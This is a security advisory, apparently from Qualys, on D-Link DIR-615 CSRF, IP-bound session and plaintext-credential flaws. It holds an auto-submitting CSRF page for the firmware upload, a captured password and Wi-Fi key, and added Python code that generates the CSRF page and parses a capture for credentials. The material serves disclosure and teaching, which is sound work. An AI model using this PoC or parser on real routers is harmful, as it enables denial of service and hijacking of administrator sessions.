Qualys Security Advisory QSA-2017-03-12 


March 12, 2017 


D-Link DIR-615 Router Multiple Vulnerabilities 


SYNOPSIS: 


The D-Link DIR-615 series router suffers from multiple Cross-Site Request Forgery, Sensitive Information
Disclosure and Weak IP-Based Session Management vulnerabilities.


Reference: http://support.dlink.com/ProductInfo.aspx?m=DIR-615

CVE:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7404
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7405
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7406


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target Router: DIR-615 Router (Hardware Version: T1, Firmware Version: 20.12PTb01)
2. Target IP Address: 192.168.100.1
3. Malicious Site: http://139.XX.XX.XXX


Vulnerable/Tested Version: 


The DIR-615 running the latest firmware version 20.12PTb01 is affected. Other models may also be affected.


[Screenshot: router status page at http://192.168.100.1/index.htm. Hardware version: T1; Firmware version: 20.12;
Product Name: DIR-615; Uptime: 0 01:37:07; Date/Time: Thu Jan 1 01:37:07 1970. "This page shows the current
status and some basic settings of the device."]


Vulnerability#1: Cross Site Request Forgery Vulnerability on Firmware Upgrade Page


The device does not protect the following sensitive page from CSRF attacks:
1. Firmware Upgrade Page: http://192.168.100.1/form2file.htm


An unauthenticated, remote attacker could host a malicious website that sends a forged POST request to the
Firmware Upgrade Page from the victim's browser.


Risk Factor: High 


Impact: 


If a victim is logged in to the router's web interface and visits a malicious site from another tab in the same
browser, the malicious site can send requests to the victim's router without knowing the credentials.


An attacker can host a page that sends a POST request to form2file.htm which tries to upload a firmware image to
the victim's router. This causes the router to reboot/crash, resulting in a denial of service. With further work an
attacker may also succeed in uploading a malicious firmware image.


Proof-Of-Concept: CSRF on Firmware Upgrade Page
CVSS Score: AV:N/AC:M/Au:N/C:N/I:N/A:C


1. Capture Firmware update request in BurpSuite Pro. 


[Screenshot: Burp Suite Repeater, target http://192.168.100.1. Request:]

POST /form2file.htm HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPXKeHjfmoYr6Ec2a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.100.1/upload.htm

------WebKitFormBoundaryPXKeHjfmoYr6Ec2a
Content-Disposition: form-data; name="download image file"; filename="DIR-615T1_FW2012PTB01.img"
Content-Type: application/octet-stream

[binary firmware image, 1,327,488-byte body, omitted]

[Response: HTTP/1.1 200 OK, Content-Type: text/html. The body is an "Autoboot" page that loads util.js, share.js
and menu.js and whose script (var wtime=180; function start() { if(wtime==180) { wtime =
parseInt(document.frm.waitTime.value); ... }) counts down while the router reboots.]


2. Generate CSRF-PoC using BurpSuite Pro 


[Screenshot: Burp Suite CSRF PoC generator.]

Request to: http://192.168.100.1

POST /form2file.htm HTTP/1.1
Host: 192.168.100.1
Content-Length: 1327488
Cache-Control: max-age=0
Origin: http://192.168.100.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPXKeHjfmoYr6Ec2a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.100.1/upload.htm

CSRF HTML:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.100.1/form2file.htm" method="POST" enctype="text/plain">
      <input type="hidden" name="&#45;&#45;&#45;&#45;&#45;&#45;WebKitFormBoundaryPXKeHjfmoYr6Ec2a&#13;&#10;Content&#45;Disposition&#58;&#32;form&#45;data&#59;&#32;name" value="&quot;download&#32;image&#32;file&quot;&#59;&#32;filename&#61;&quot;DIR&#45;615T1&#95;FW2012PTB01&#46;img&quot;&#13;&#10;Content&#45;Type&#58;&#32;application&#47;octet&#45;stream&#13;&#10;&#13;&#10;[firmware image bytes, HTML-entity encoded, omitted]" />
      [remainder of the generated page truncated in the screenshot]

Warning: The CSRF form uses a different encoding type than the original request, and so the application may not process the request in the way required.

[Buttons: Regenerate | Test in browser | Copy HTML | Close]


Note: Make sure to select Options->CSRF Technique->Plain Text Form and Options->CSRF 
Technique->Include auto-submit script options 


3. Copy this HTML and save it as Burp-CSRF.html under the web root on the Kali machine.


Note: I've already hosted it on the malicious site http://139.XX.XX.XXX/Burp-CSRF.html


4. Victim logs into the router's web interface.


5. Victim visits http://139.XX.XX.XXX/Burp-CSRF.html 


[Screenshot: Firefox with the router tab still open; the victim is on http://139.XX.XX.XXX/Burp-CSRF.html, which
shows only a "Submit request" button.]


Note: The victim doesn't have to click the 'Submit request' button because the 'Include auto-submit script'
option was used while generating the CSRF PoC in BurpSuite; the form is submitted automatically on page load.


The router resets the connection.


[Screenshot: the browser now sits on http://192.168.100.1/form2file.htm and Burp Suite Professional reports:
"Error: Connection reset by peer: socket write error".]


Request in BurpSuite:


[Burp HTTP history, filter: Hiding CSS, image and general binary content]

#     Host                   Method  URL               Status  Length   MIME  Title
20    http://192.168.100.1   GET     /wlan_basic.htm   200     29332    HTML  WLAN Basic Settings
2006  http://139.XX.XX.XXX   GET     /Burp-CSRF.html   200     4643...  HTML
2007  http://192.168.100.1   POST    /form2file.htm                     HTML


Entry 2006: the victim visits the malicious page. Response from the attacker's web server:

HTTP/1.1 200 OK
Date: Mon, 13 Mar 2017 10:48:10 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Mon, 13 Mar 2017 10:26:58 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 4642772

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
[rest of the generated PoC page]


Entry 2007: the malicious page sends the firmware upload request to the victim's router:

POST /form2file.htm HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://139.XX.XX.XXX/Burp-CSRF.html
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/plain
Content-Length: 1717078

------WebKitFormBoundaryPXKeHjfmoYr6Ec2a
Content-Disposition: form-data; name="download image file"; filename="DIR-615T1_FW2012PTB01.img"
Content-Type: application/octet-stream

[firmware image being uploaded]


The router is now inaccessible. Also, the Wireless LAN icon in the system tray indicates that it has connectivity
issues.
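As an added worked example (not part of the advisory, and not Qualys or D-Link code), the Python script below reproduces the "Plain Text Form" trick that Burp's CSRF PoC generator applies in step 2. The captured multipart body is split at its first "=" so that the browser's text/plain form encoding, which sends each control as name=value followed by CRLF, reassembles the original body; the two halves are entity-encoded into one hidden input. It also simulates what the browser actually transmits, which makes Burp's warning concrete: bytes above 0x7F in the image are re-encoded in the page's charset, so the router receives a different and larger body than the original upload. The boundary, field name and filename are the ones from the captured request; the image bytes, the function names and the character handling are constructed for the demo.

```python
import html

# Values seen in the advisory's captured upload request.  FAKE_IMAGE is a constructed
# stand-in containing NUL, high and printable bytes, not a real DIR-615 firmware image.
BOUNDARY = "----WebKitFormBoundaryPXKeHjfmoYr6Ec2a"
FIELD_NAME = "download image file"
FILENAME = "DIR-615T1_FW2012PTB01.img"
FAKE_IMAGE = b"DIR615\x00\x01\x80\xff\x7frouter.img" + bytes(range(0, 256, 17))


def build_multipart(boundary, field, filename, data):
    """Build a multipart/form-data body shaped like the one upload.htm submits."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode("ascii")
    tail = f"\r\n--{boundary}--\r\n".encode("ascii")
    return head + data + tail


def split_for_text_plain_form(body):
    """Burp's 'Plain Text Form' technique: split the raw body at its first '='.

    A text/plain form submits each control as  name=value\\r\\n , so the left half
    goes into the hidden input's name and the right half into its value.  Bytes
    are mapped 1:1 to characters via latin-1 so every value 0x00-0xFF survives.
    """
    idx = body.find(b"=")
    if idx < 0:
        raise ValueError("body contains no '='; the text/plain trick cannot be applied")
    return body[:idx].decode("latin-1"), body[idx + 1:].decode("latin-1")


def entity_encode(text):
    """Encode control, non-ASCII and attribute-breaking characters as &#NNN; references."""
    out = []
    for ch in text:
        code = ord(ch)
        if code < 0x20 or code > 0x7E or ch in '"&<>':
            out.append(f"&#{code};")
        else:
            out.append(ch)
    return "".join(out)


def render_poc(action, name, value, auto_submit=True):
    """Render a CSRF page in the same shape as the Burp-generated PoC."""
    submit_js = "<script>document.forms[0].submit();</script>" if auto_submit else ""
    return (
        "<html>\n<body>\n"
        "<script>history.pushState('', '', '/')</script>\n"
        f'<form action="{html.escape(action, quote=True)}" method="POST" enctype="text/plain">\n'
        f'<input type="hidden" name="{entity_encode(name)}" value="{entity_encode(value)}" />\n'
        '<input type="submit" value="Submit request" />\n'
        f"</form>\n{submit_js}\n</body>\n</html>\n"
    )


def simulate_text_plain_submission(name, value, charset="utf-8"):
    """Bytes a browser sends for one text/plain form control: name=value CRLF.

    Browsers encode the strings in the document's charset.  With latin-1 the
    original body comes back unchanged; with the usual utf-8 every character
    above 0x7F becomes two bytes, so the router sees a larger, altered image.
    """
    return (name + "=" + value + "\r\n").encode(charset)


if __name__ == "__main__":
    body = build_multipart(BOUNDARY, FIELD_NAME, FILENAME, FAKE_IMAGE)
    name, value = split_for_text_plain_form(body)
    print(render_poc("http://192.168.100.1/form2file.htm", name, value)[:300])
    print("original:", len(body),
          "latin-1:", len(simulate_text_plain_submission(name, value, "latin-1")),
          "utf-8:", len(simulate_text_plain_submission(name, value, "utf-8")))
```

Two browser behaviours the simulation does not model also corrupt the image: an HTML numeric reference &#0; is parsed as U+FFFD rather than a NUL byte, and the page's charset decides how everything above 0x7F is sent. Both mean the bytes that reach form2file.htm differ from the original upload, which fits the advisory's observation that the request ends in a reboot/crash rather than a successful flash, and that the forged request (Content-Length 1717078) is larger than the original (1327488).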


Vulnerability#2: IP Based Weak Session Management 


Once a user is authenticated, this device keeps track of the user's session by using the IP address of his machine.
An internal attacker could sniff the network traffic to find out whether a victim is logged into the router.


Risk Factor: High 


Impact: 


Once authenticated, this device identifies the user based on the source IP address of the victim's host. By
spoofing the IP address belonging to the victim's host, an attacker might be able to take over the administrative
session without being prompted for authentication credentials. An attacker can get the victim's and the router's
IP addresses by simply sniffing the network traffic.


Proof-Of-Concept: 
CVSS Score: AV:N/AC:M/Au:N/C:N/I:C/A:C


1. Launch Internet Explorer and log into the router's web interface 


[Screenshot: Internet Explorer at http://192.168.100.1/index.htm after login. Product Page: DIR-615. Hardware
version: T1; Firmware version: 20.12; Product Name: DIR-615; Uptime: 0 00:15:38; Date/Time: Thu Jan 1 00:15:38
1970. LAN Configuration: IP Address 192.168.100.1, Subnet Mask 255.255.255.0, DHCP Server Enable, MAC Address
3C:1E:04:24:56:BC. Sidebar: Active Client Table, IPV6 Routing Table. Helpful Hints: "This page displays a summary
overview of your router status, including device firmware version summary of your Internet configuration
including ethernet status."]


2. Now launch Firefox and access http://192.168.100.1/wlan_basic.htm


[Screenshot: Firefox at http://192.168.100.1/wlan_basic.htm, loaded without any login prompt. "This page is used
to configure the parameters for wireless LAN clients which may connect to your Access Point. Here you may change
wireless encryption settings as well as wireless network parameters." Wireless Network: Enable SSID Broadcast:
checked; Enable Wireless Isolation: unchecked; Name(SSID): Jaguar; Mode: 802.11n; Channel: Auto (Current
Channel: 6); Band Width: Auto 20/40M; a Security Options section follows.]


It doesn't prompt for a password. Looking at the request in BurpSuite, the interface uses neither a cookie nor HTTP
Basic/Digest authentication for session management.


[Burp HTTP history]

#     Host                   Method  URL                               Status  Length  MIME
2188  http://192.168.100.1   GET     /util.js                          200     38040   script
2189  http://192.168.100.1   GET     /share.js                         200     30315   script
2190  http://192.168.100.1   GET     /menu.js?v=0.3171912422961619     200     24569   script
2192  http://192.168.100.1   GET     /wlanhelp.htm?rnd=0.589331312...  200     3198    script


Request (note the empty Cookie header):

GET /wlan_basic.htm HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/status.htm
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1


Also highlighted is the Pre-Shared Key returned in the response body:


[Burp HTTP history, filter: Hiding CSS, image and general binary content]

#     Host                   Method  URL                               Status  Length  MIME    Extension
2107  http://192.168.100.1   GET     /util.js                          200     38040   script  js
2108  http://192.168.100.1   GET     /share.js                         200     30318   script  js
2109  http://192.168.100.1   GET     /menu.js?v=0.36457448914999246    200     24569   script  js
2111  http://192.168.100.1   GET     /wlanhelp.htm?rnd=0.364290469...  200     3198    script  htm


Response (HTML) for /wlan_basic.htm, with the pre-shared key in the page source:

</select>
</td>
</tr>
<tr id=tr_psk style="">
<td class="form_label_35">Pre-Shared Key:</td>
<td>
<input type="text" name="pskValue" size="32" maxlength="64" value="+,t4}8^LXYrq" >(8-63 characters or 64 hex digits)


An attacker can simply spoof the victim's IP address and take over the victim's session. Moreover, if the victim has
remote web access enabled on the router and is accessing the web interface from a different network behind
NAT or a proxy, an attacker who can sniff the traffic learns the public IP address of the victim's router and,
because every host behind the same NAT/proxy presents the victim's source address, can take over the session
without being prompted for credentials.
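To make the finding concrete, here is an added example (not the router's firmware logic and not Qualys code) that models the two session designs side by side in Python: a table keyed by the client's source IP, which is how the advisory describes the DIR-615 behaving, and a hardened table keyed by a random token carried in an HttpOnly cookie with an expiry. The PoC's "log in from Internet Explorer, then open wlan_basic.htm from Firefox" test is replayed against both: the second browser has no cookie but the same source address, so the IP-keyed table accepts it and the token-keyed table rejects it. The request model, the demo credentials and the class names are assumptions for this example.

```python
import hmac
import secrets
import time
from dataclasses import dataclass, field

# Constructed demo credential store; the real device's password check is not modelled.
VALID_USERS = {"Admin": "demo-admin-password"}


@dataclass
class Request:
    """Minimal model of what the embedded web server sees for one request."""
    src_ip: str
    cookies: dict = field(default_factory=dict)


class IpSessionTable:
    """Vulnerable design (as described for the DIR-615): a successful login marks the
    *source IP address* as authenticated, and nothing is set in the browser."""

    def __init__(self):
        self.authenticated_ips = set()

    def login(self, req, username, password):
        if VALID_USERS.get(username) == password:
            self.authenticated_ips.add(req.src_ip)
            return {}  # no cookie: every later request from this IP is trusted
        return None

    def is_authenticated(self, req):
        return req.src_ip in self.authenticated_ips


class TokenSessionTable:
    """Hardened design: a random token sent as an HttpOnly cookie identifies the session,
    expires after ttl_seconds and is optionally bound to the IP that created it."""

    def __init__(self, ttl_seconds=600, bind_to_ip=True):
        self.sessions = {}
        self.ttl = ttl_seconds
        self.bind_to_ip = bind_to_ip

    def login(self, req, username, password, now=None):
        if VALID_USERS.get(username) != password:
            return None
        now = time.time() if now is None else now
        token = secrets.token_hex(16)  # 128 bits from the OS CSPRNG
        self.sessions[token] = {"user": username, "ip": req.src_ip, "expires": now + self.ttl}
        # The server would send: Set-Cookie: SessionID=<token>; HttpOnly; SameSite=Strict; Path=/
        return {"SessionID": token}

    def is_authenticated(self, req, now=None):
        now = time.time() if now is None else now
        presented = req.cookies.get("SessionID", "").encode()
        for token, sess in self.sessions.items():
            if hmac.compare_digest(token.encode(), presented):  # constant-time compare
                if sess["expires"] < now:
                    return False
                if self.bind_to_ip and sess["ip"] != req.src_ip:
                    return False
                return True
        return False


def replay_poc(table):
    """Step 1: log in from Internet Explorer.  Step 2: request wlan_basic.htm from Firefox
    on the same host: same source IP, separate cookie jar.  Returns (ie_ok, firefox_ok)."""
    ie = Request(src_ip="192.168.100.23")
    ie.cookies.update(table.login(ie, "Admin", VALID_USERS["Admin"]))
    firefox = Request(src_ip="192.168.100.23")  # no cookies: second browser, NAT peer or spoofed source
    return table.is_authenticated(ie), table.is_authenticated(firefox)


if __name__ == "__main__":
    print("IP-keyed sessions   (IE, Firefox):", replay_poc(IpSessionTable()))
    print("token-keyed sessions (IE, Firefox):", replay_poc(TokenSessionTable()))
```

Binding the token to the client IP is a defence in depth, not a substitute for the token: without HTTPS (vulnerability #3 below) a sniffer still reads the cookie, so the hardened table only closes the spoofing and shared-NAT cases the advisory describes.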


Vulnerability#3: Sensitive Information Disclosure 


This device doesn't use SSL/TLS for any of the authenticated pages, and it doesn't allow the user to install or
generate his own SSL certificate. An attacker can simply monitor the network traffic (for example on an open
wireless network) and steal the user's credentials, and/or the credentials of any users being added, while sniffing
the traffic.


Risk Factor: High 


Impact: 


An attacker can steal the user's credentials for the router's web interface, thus compromising Confidentiality,
Integrity and Availability.


Proof-Of-Concept: 
CVSS Score: AV:N/AC:L/Au:N/C:N/I:C/A:C


1. Log into the router's web interface.
2. The credentials are submitted in plain text:


[Burp HTTP history, filter: Hiding CSS, image and general binary content]

#     Host                   Method  URL         Status  Length  MIME
2156  http://192.168.100.1   GET     /login.htm  200     3436    HTML


Request:

POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

username=Admin&password=%2B%2Ct4%7D8%5ELXYrq&submit.htm%3Flogin.htm=Login
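The following added example (not part of the advisory) shows what a passive observer on the same network recovers from this traffic, and serves both vulnerability #2 and vulnerability #3. It parses a constructed capture shaped like the requests and responses in the Burp screenshots: the POST to /login.cgi yields the URL-decoded username and password, the /wlan_basic.htm response yields the pre-shared key from the pskValue input, and an authenticated request that carries no Cookie value and no Authorization header is flagged as relying on the IP-bound session. The capture text, the demo credentials, the demo PSK and the function names are constructed for this example; the real values from the page are not reused.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed capture: (flow, raw HTTP message).  Shapes mirror the advisory's screenshots;
# the password and PSK are demo values chosen to exercise percent-decoding.
CAPTURE = [
    ("192.168.100.23 -> 192.168.100.1",
     "POST /login.cgi HTTP/1.1\r\nHost: 192.168.100.1\r\n"
     "Referer: http://192.168.100.1/login.htm\r\nCookie: SessionID=\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 69\r\n\r\n"
     "username=Admin&password=p%40ss%2Cw0rd%21&submit.htm%3Flogin.htm=Login"),
    ("192.168.100.23 -> 192.168.100.1",
     "GET /wlan_basic.htm HTTP/1.1\r\nHost: 192.168.100.1\r\n"
     "Referer: http://192.168.100.1/status.htm\r\nCookie: \r\nConnection: close\r\n\r\n"),
    ("192.168.100.1 -> 192.168.100.23",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
     '<tr id=tr_psk><td class="form_label_35">Pre-Shared Key:</td><td>'
     '<input type="text" name="pskValue" size="32" maxlength="64" value="demo-psk-2017">'
     "(8-63 characters or 64 hex digits)</td></tr>"),
]

# Pages that are legitimately fetched before a session exists.
PRE_AUTH_PATHS = {"/login.htm", "/login.cgi"}


def parse_http(raw):
    """Split one HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def has_session_material(headers):
    """True if the request carries anything a server could use instead of the source IP:
    an Authorization header or a cookie with a non-empty value ('SessionID=' does not count)."""
    if "authorization" in headers:
        return True
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.partition("=")
        if name.strip() and value.strip():
            return True
    return False


class PskExtractor(HTMLParser):
    """Collect the value attribute of every <input name="pskValue"> in a page."""

    def __init__(self):
        super().__init__()
        self.psk = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("name") == "pskValue":
            self.psk.append(a.get("value", ""))


def analyze_capture(capture):
    """Return a list of (finding, detail, context) tuples for the captured messages."""
    findings = []
    for flow, raw in capture:
        start, headers, body = parse_http(raw)
        if start.startswith("HTTP/"):               # a response: look for disclosed secrets
            extractor = PskExtractor()
            extractor.feed(body)
            for psk in extractor.psk:
                findings.append(("psk-disclosed", psk, flow))
            continue
        method, path = start.split(" ")[:2]        # a request
        if method == "POST" and path == "/login.cgi":
            form = parse_qs(body, keep_blank_values=True)
            findings.append(("plaintext-credentials",
                             form.get("username", [""])[0],
                             form.get("password", [""])[0]))
        elif path not in PRE_AUTH_PATHS and not has_session_material(headers):
            findings.append(("no-session-token", path, flow))
    return findings


if __name__ == "__main__":
    for finding in analyze_capture(CAPTURE):
        print(finding)
```

parse_qs performs the percent-decoding, so the sniffer ends up with exactly the string the administrator typed; on an open wireless network, or anywhere on the path between a remotely managing administrator and the router, that is all an attacker needs for vulnerability #3, and the no-session-token finding is the packet-level signature of vulnerability #2.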


CREDITS: 


The discovery and documentation of these vulnerabilities was conducted by Kapil Khot, Qualys.


CONTACT:


For more information about the Qualys Security Research Team, visit our website at
http://www.qualys.com or send email to research@qualys.com